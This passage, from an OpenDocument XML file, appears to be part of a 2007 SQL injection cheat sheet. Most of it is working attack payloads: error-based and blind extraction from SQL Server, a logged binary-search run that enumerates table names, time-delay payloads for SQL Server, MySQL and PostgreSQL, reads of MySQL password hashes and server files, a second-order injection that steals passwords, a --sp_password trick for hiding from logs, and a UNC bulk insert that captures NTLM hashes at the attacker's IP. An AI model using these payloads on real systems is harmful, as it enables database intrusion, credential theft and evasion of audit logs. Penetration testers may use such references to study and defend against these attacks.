          <text:p text:style-name="P43">Using Dirty Tricks<text:line-break/><text:span text:style-name="Source_20_Text">SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id&lt;=o.id) AS x, name from sysobjects o) as p where p.x=3) as int </text:span><text:line-break/><text:span text:style-name="Source_20_Text"><text:line-break/>Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id&lt;=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21</text:span></text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">  </text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true">Fast way to extract data from Error Based SQL Injections in SQL Server (S)</text:h>
      <text:p text:style-name="Text_20_body"><text:bookmark text:name="gr1"/><text:span text:style-name="Source_20_Text">';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name&gt;@rd SELECT @rd AS rd into TMP_SYS_TMP end;--</text:span></text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Strong_20_Emphasis">Detailed Article : </text:span><text:bookmark text:name="gr2"/><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/fast-way-to-extract-data-from-error-based-sql-injections/">Fast way to extract data from Error Based SQL Injections</text:a></text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2" text:is-list-header="true">Blind SQL Injections </text:h>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true">About Blind SQL Injections </text:h>
      <text:p text:style-name="Text_20_body">In a quite good production application generally <text:span text:style-name="Strong_20_Emphasis">you can not see error responses on the page</text:span>, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections. </text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Strong_20_Emphasis">Normal Blind</text:span>, You can not see a response in the page but you can still determine result of a query from response or HTTP status code <text:line-break/><text:span text:style-name="Strong_20_Emphasis">Totally Blind</text:span>, You can not see any difference in the output in any kind. This can be an injection a logging function or similar. Not so common though. </text:p>
      <text:p text:style-name="Text_20_body">In normal blinds you can use <text:span text:style-name="Strong_20_Emphasis">if statements</text:span> or abuse <text:span text:style-name="Strong_20_Emphasis">WHERE query in injection</text:span> (<text:span text:style-name="Emphasis">generally easier</text:span>), in totally blinds you need to use some waiting functions and analyze response times. For this you can use <text:span text:style-name="Strong_20_Emphasis">WAIT FOR DELAY '0:0:10' </text:span>in SQL Server, BENCHMARK() in MySQL, <text:span text:style-name="Strong_20_Emphasis">pg_sleep(10) </text:span>in PostgreSQL, and some PL/SQL tricks in ORACLE.</text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true"><text:bookmark text:name="BSQLAttackSamples"/>Real and a bit Complex Blind SQL Injection Attack Sample</text:h>
      <text:p text:style-name="Text_20_body">This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names. This requests done for first char of the first table name. SQL queries a bit more complex then requirement because of automation reasons. In we are trying to determine an ascii value of a char via binary search algorithm. </text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Emphasis"><text:span text:style-name="Strong_20_Emphasis">TRUE</text:span></text:span><text:span text:style-name="Emphasis"> and </text:span><text:span text:style-name="Emphasis"><text:span text:style-name="Strong_20_Emphasis">FALSE</text:span></text:span><text:span text:style-name="Emphasis"> flags mark queries returned true or false. </text:span></text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">TRUE</text:span></text:span><text:span text:style-name="Source_20_Text"> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;78-- <text:line-break/><text:line-break/></text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">FALSE</text:span></text:span><text:span text:style-name="Source_20_Text"> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;103-- <text:line-break/><text:line-break/></text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">TRUE</text:span></text:span><text:span text:style-name="Source_20_Text"> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&lt;103-- <text:line-break/><text:line-break/></text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">FALSE</text:span></text:span><text:span text:style-name="Source_20_Text"> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;89-- <text:line-break/><text:line-break/></text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">TRUE</text:span></text:span><text:span text:style-name="Source_20_Text"> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&lt;89--<text:line-break/><text:line-break/></text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">FALSE</text:span></text:span><text:span text:style-name="Source_20_Text"> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;83-- <text:line-break/><text:line-break/></text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">TRUE</text:span></text:span><text:span text:style-name="Source_20_Text"> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&lt;83-- <text:line-break/><text:line-break/></text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">FALSE</text:span></text:span><text:span text:style-name="Source_20_Text"> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;80-- <text:line-break/><text:line-break/></text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">FALSE</text:span></text:span><text:span text:style-name="Source_20_Text"> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&lt;80-- </text:span></text:p>
      <text:p text:style-name="Text_20_body">Since both of the <text:span text:style-name="Strong_20_Emphasis">last 2 queries failed </text:span>we clearly know table name's first char's <text:span text:style-name="Strong_20_Emphasis">ascii value is 80 which means first char is `P`</text:span>. This is the way to exploit Blind SQL injections by binary search algorithm. Other well known way is reading data bit by bit. Both can be effective in different conditions. </text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true"> </text:h>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true">Waiting For Blind SQL Injections</text:h>
      <text:p text:style-name="Text_20_body">First of all use this if it's really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout.</text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">WAIT FOR DELAY 'time' (S) </text:h>
      <text:p text:style-name="Text_20_body">This is just like sleep, wait for spesified time. CPU safe way to make database wait. </text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">WAITFOR DELAY '0:0:10'--</text:span></text:p>
      <text:p text:style-name="Text_20_body">Also you can use fractions like this,</text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">WAITFOR DELAY '0:0:0.51'</text:span></text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">Real World Samples </text:h>
      <text:list text:style-name="L29">
        <text:list-item>
          <text:p text:style-name="P44">Are we 'sa' ?<text:line-break/><text:span text:style-name="Source_20_Text">if (select user) = 'sa' waitfor delay '0:0:10' </text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P44">ProductID = <text:span text:style-name="Source_20_Text">1;waitfor delay '0:0:10'--</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P44">ProductID =<text:span text:style-name="Source_20_Text">1);waitfor delay '0:0:10'--</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P44">ProductID =<text:span text:style-name="Source_20_Text">1';waitfor delay '0:0:10'--</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P44">ProductID =<text:span text:style-name="Source_20_Text">1');waitfor delay '0:0:10'--</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P44">ProductID =<text:span text:style-name="Source_20_Text">1));waitfor delay '0:0:10'--</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P45">ProductID =<text:span text:style-name="Source_20_Text">1'));waitfor delay '0:0:10'--</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">BENCHMARK() (M)</text:h>
      <text:p text:style-name="Text_20_body">Basically we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!</text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">BENCHMARK(howmanytimes, do this)</text:span></text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">Real World Samples </text:h>
      <text:list text:style-name="L30">
        <text:list-item>
          <text:p text:style-name="P46">Are we root ? woot!<text:line-break/><text:span text:style-name="Source_20_Text">IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))</text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P46">Check Table exist in MySQL<text:line-break/><text:span text:style-name="Source_20_Text">IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))</text:span></text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">pg_sleep(seconds) (P)</text:h>
      <text:p text:style-name="Text_20_body">Sleep for supplied seconds. </text:p>
      <text:list text:style-name="L31">
        <text:list-item>
          <text:p text:style-name="P47"><text:span text:style-name="Source_20_Text">SELECT pg_sleep(10); </text:span><text:line-break/>Sleep 10 seconds. </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_2" text:outline-level="2" text:is-list-header="true">Covering Tracks</text:h>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">SQL Server -sp_password log bypass (S) </text:h>
      <text:p text:style-name="Text_20_body">SQL Server don't log queries which includes sp_password for security reasons(!). So if you add --sp_password to your queries it will not be in SQL Server logs (<text:span text:style-name="Emphasis">of course still will be in web server logs</text:span>, <text:span text:style-name="Emphasis">try to use POST if it's possible</text:span>) </text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2" text:is-list-header="true">Clear SQL Injection Tests</text:h>
      <text:p text:style-name="Text_20_body">These tests are simply good for blind sql injection and silent attacks.</text:p>
      <text:list text:style-name="L32">
        <text:list-item>
          <text:p text:style-name="P48"><text:span text:style-name="Source_20_Text">product.asp?id=4 (SMO) </text:span></text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P48"><text:span text:style-name="Source_20_Text">product.asp?id=5-1</text:span> </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P49"><text:span text:style-name="Source_20_Text">product.asp?id=4 OR 1=1</text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P48"><text:span text:style-name="Source_20_Text">product.asp?name=Book</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:list text:style-name="L32">
        <text:list-item text:start-value="1">
          <text:list>
            <text:list-item text:start-value="1">
              <text:p text:style-name="P48"><text:span text:style-name="Source_20_Text">product.asp?name=Bo’%2b’ok</text:span> </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P48"><text:span text:style-name="Source_20_Text">product.asp?name=Bo’ || ’ok (</text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Emphasis">OM</text:span></text:span><text:span text:style-name="Source_20_Text">)</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P49"><text:span text:style-name="Source_20_Text">product.asp?name=Book’ OR ‘x’=’x</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_2" text:outline-level="2" text:is-list-header="true">Some Extra MySQL Notes </text:h>
      <text:list text:style-name="L33">
        <text:list-item>
          <text:p text:style-name="P50">Sub Queries are working only MySQL 4.1+ </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50">Users </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">SELECT User,Password FROM mysql.user;</text:span> </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ‘root’;</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">SELECT ... INTO DUMPFILE</text:span> </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">Write query into a </text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">new file </text:span></text:span><text:span text:style-name="Source_20_Text">(</text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Emphasis">can not modify existing file</text:span></text:span><text:span text:style-name="Source_20_Text">s)</text:span> </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50">UDF Function </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">create function LockWorkStation returns integer soname 'user32';</text:span> </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">select LockWorkStation();</text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">create function ExitProcess returns integer soname 'kernel32';</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">select exitprocess();</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">SELECT USER();</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">SELECT password,USER() FROM mysql.user;</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50">First byte of admin hash </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;</text:span> </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50">Read File </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1</text:span> </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50">MySQL Load Data inifile </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P50"><text:span text:style-name="Strong_20_Emphasis">By default it’s not avaliable !</text:span> </text:p>
              <text:list>
                <text:list-item>
                  <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">create table foo( line blob );<text:line-break/>load data infile 'c:/boot.ini' into table foo;<text:line-break/>select * from foo;</text:span> </text:p>
                </text:list-item>
              </text:list>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50">More Timing in MySQL </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">select benchmark( 500000, sha1( 'test' ) );</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 </text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P50"><text:span text:style-name="Source_20_Text">select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );<text:line-break/></text:span><text:span text:style-name="Strong_20_Emphasis">Enumeration data, Guessed Brute Force</text:span> </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P51"><text:span text:style-name="Source_20_Text">select if( (ascii(substring(user(),1,1)) &gt;&gt; 7) &amp; 1, benchmark(100000,sha1('test')), 'false' );</text:span> </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">Potentially Useful MySQL Functions</text:h>
      <text:list text:style-name="L34">
        <text:list-item>
          <text:p text:style-name="P52"><text:span text:style-name="Source_20_Text">MD5()</text:span><text:line-break/>MD5 Hashing </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P53"><text:span text:style-name="Source_20_Text">SHA1()</text:span><text:line-break/>SHA1 Hashing </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P52"><text:span text:style-name="Source_20_Text">PASSWORD()</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P52"><text:span text:style-name="Source_20_Text">ENCODE()</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P52"><text:span text:style-name="Source_20_Text">COMPRESS()</text:span><text:line-break/>Compress data, can be great in large binary reading in Blind SQL Injections.</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P52"><text:span text:style-name="Source_20_Text">ROW_COUNT()</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P52"><text:span text:style-name="Source_20_Text">SCHEMA()</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P53"><text:span text:style-name="Source_20_Text">VERSION()</text:span><text:line-break/>Same as <text:span text:style-name="Source_20_Text">@@version</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_2" text:outline-level="2" text:is-list-header="true">Second Order SQL Injections</text:h>
      <text:p text:style-name="Text_20_body">Basically you put an SQL Injection to some place and expect it's unfiltered in another action. This is common hidden layer problem. </text:p>
      <text:p text:style-name="Text_20_body">Name : <text:span text:style-name="Source_20_Text"> ' + (SELECT TOP 1 password FROM users ) + ' </text:span><text:line-break/>Email :<text:span text:style-name="Source_20_Text"> </text:span><text:a xlink:type="simple" xlink:href="mailto:xx@xx.com"><text:span text:style-name="Source_20_Text">xx@xx.com</text:span></text:a></text:p>
      <text:p text:style-name="Text_20_body">If application is using name field in an unsafe stored procedure or function, process etc. then it will insert first users password as your name etc.</text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true">Forcing SQL Server to get NTLM Hashes </text:h>
      <text:p text:style-name="Text_20_body">This attack can help you to get SQL Server user's Windows password of target server, but possibly you inbound connection will be firewalled. Can be very useful internal penetration tests. We force SQL Server to connect our Windows UNC Share and capture data NTLM session with a tool like Cain &amp; Abel.</text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">Bulk insert from a UNC Share (S)<text:line-break/><text:span text:style-name="Source_20_Text">bulk insert foo from '\\YOURIPADDRESS\C$\x.txt' </text:span></text:h>
      <text:p text:style-name="Text_20_body">Check out Bulk Insert Reference to understand how can you use bulk inser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11-02T14:00:50</meta:creation-date>
    <dc:date>2007-11-02T14:02:13</dc:date>
    <dc:language>en-US</dc:language>
    <meta:editing-cycles>2</meta:editing-cycles>
    <meta:editing-duration>PT1M27S</meta:editing-duration>
    <meta:user-defined meta:name="Info 1"/>
    <meta:user-defined meta:name="Info 2"/>
    <meta:user-defined meta:name="Info 3"/>
    <meta:user-defined meta:name="Info 4"/>
    <meta:document-statistic meta:table-count="2" meta:image-count="0" meta:object-count="0" meta:page-count="16" meta:paragraph-count="357" meta:word-count="3937" meta:character-count="24329"/>
  </office:meta>
</office:document-meta>
</file>